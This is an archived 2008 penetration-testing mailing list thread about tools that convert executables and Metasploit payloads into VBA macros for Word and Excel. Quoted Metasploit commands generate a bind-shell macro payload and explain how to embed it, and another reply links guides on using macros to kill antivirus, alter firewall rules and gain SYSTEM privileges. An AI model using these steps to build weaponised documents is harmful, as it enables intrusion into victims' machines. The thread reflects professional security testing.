Penetration Testing mailing list archives
Re: Exe2vba - Anybody still have this?
From: natron <natron () invisibledenizen org>
Date: Sun, 16 Nov 2008 20:50:17 -0600
I wrote up a quick series of posts on how to use VBA to do all kinds of things, as long as the user running the Excel/Word file has the necessary rights. If anyone would find them useful:

Running commands or launching programs:
http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html

Downloading files and saving them to disk:
http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html

Running commands as SYSTEM:
http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html

Killing off any antivirus that may be running:
http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html

Modifying the Windows Firewall:
http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html

What I would really love to see would be a combination of the Churrasco exploit (http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html) into VBA, so that even if the user is running in a limited account, they'd be able to gain SYSTEM privileges.

-n

On Wed, Nov 12, 2008 at 1:21 PM, H D Moore <sflist () digitaloffense net> wrote:
> Hi Joseph,
>
> I added this to Metasploit. You can use the VBA generator in a few different ways:
>
> 1) Convert an EXE to a VBA script (works on Word/Excel automatically):
>
> $ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba
>
> 2) Create a VBA script that runs a Metasploit payload
>
> $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba
>
> 3) Create a VBA script that runs an encoded Metasploit payload
>
> $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \
>   ruby msf3/msfencode -a x86 -b '' -t vba > output.vba
>
> To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual Basic Editor, paste in, save, and exit. Works pretty well here :-)
>
> You need the latest SVN of Metasploit 3.2 trunk:
>
> $ svn co http://metasploit.com/svn/framework3/trunk/
>
> On Windows, follow this guide:
> - http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN
>
> -HD
>
> On Tuesday 11 November 2008, Joseph McCray wrote:
> > It used to be located at:
> > http://www.priestmaster.org/tools.html
> >
> > I've been looking all over the web and really haven't been able to find this app anymore.

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now

www.cenzic.com/landing/trends-report
------------------------------------------------------------------------
Current thread:
- Exe2vba - Anybody still have this? Joseph McCray (Nov 11)
- Re: Exe2vba - Anybody still have this? Lucas Lyon (Nov 12)
- Re: Exe2vba - Anybody still have this? H D Moore (Nov 12)
- Re: Exe2vba - Anybody still have this? natron (Nov 17)
- RE: Exe2vba - Anybody still have this? Brett Moore (Nov 17)
- Re: Exe2vba - Anybody still have this? Ulisses Castro (thebug) (Nov 17)
- Re: Exe2vba - Anybody still have this? natron (Nov 17)
- <Possible follow-ups>
- Re: Exe2vba - Anybody still have this? infolookup (Nov 12)